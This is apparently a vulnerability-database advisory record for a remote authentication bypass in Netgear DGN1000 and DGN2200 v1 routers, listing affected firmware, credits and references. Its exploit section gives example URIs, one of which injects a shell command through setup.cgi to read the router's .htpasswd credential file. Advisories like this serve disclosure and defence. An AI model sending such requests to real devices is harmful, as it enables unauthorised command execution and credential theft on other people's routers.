ID
VAR-E-201305-0084
TITLE
Multiple Netgear DGN Devices Remote Authentication Bypass Vulnerability
Trust: 0.3
DESCRIPTION
Netgear DGN1000 and DGN2200 devices are prone to a remote authentication-bypass vulnerability.
Remote attackers can exploit this issue to bypass the authentication mechanism and execute commands within the context of affected devices with elevated privileges.
The following versions are vulnerable:
Netgear DGN1000 running firmware prior to version 1.1.00.48
Netgear DGN2200 v1
Trust: 0.3
AFFECTED PRODUCTS
vendor: | netgear | model: | dgn2200v1 | scope: | eq | version: | 0 | Trust: 0.3 |
vendor: | netgear | model: | dgn1000 | scope: | eq | version: | 1.1.00.41 | Trust: 0.3 |
vendor: | netgear | model: | dgn1000 | scope: | ne | version: | 1.1.00.48 | Trust: 0.3 |
EXPLOIT
Attackers can use a browser to exploit this issue.
The following example URIs are available:
http://www.example.com/setup.cgi?currentsetting.htm=1
http://www.example.com/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cat+/www/.htpasswd&curpath=/&currentsetting.htm=1
Trust: 0.3
PRICE
Free
Trust: 0.3
TYPE
Access Validation Error
Trust: 0.3
CREDITS
Roberto Paleari
Trust: 0.3
EXTERNAL IDS
db: | BID | id: | 60281 | Trust: 0.3 |
REFERENCES
url: | http://seclists.org/bugtraq/2013/jun/8 | Trust: 0.3 |
url: | http://www.netgear.com/service-provider/products/routers-and-gateways/dsl-gateways/dgn1000.aspx# | Trust: 0.3 |
url: | http://www.netgear.com/service-provider/products/routers-and-gateways/dsl-gateways/dgn2200.aspx# | Trust: 0.3 |
SOURCES
db: | BID | id: | 60281 |
LAST UPDATE DATE
2022-07-27T09:24:48.419000+00:00
SOURCES UPDATE DATE
db: | BID | id: | 60281 | date: | 2013-05-31T00:00:00 |
SOURCES RELEASE DATE
db: | BID | id: | 60281 | date: | 2013-05-31T00:00:00 |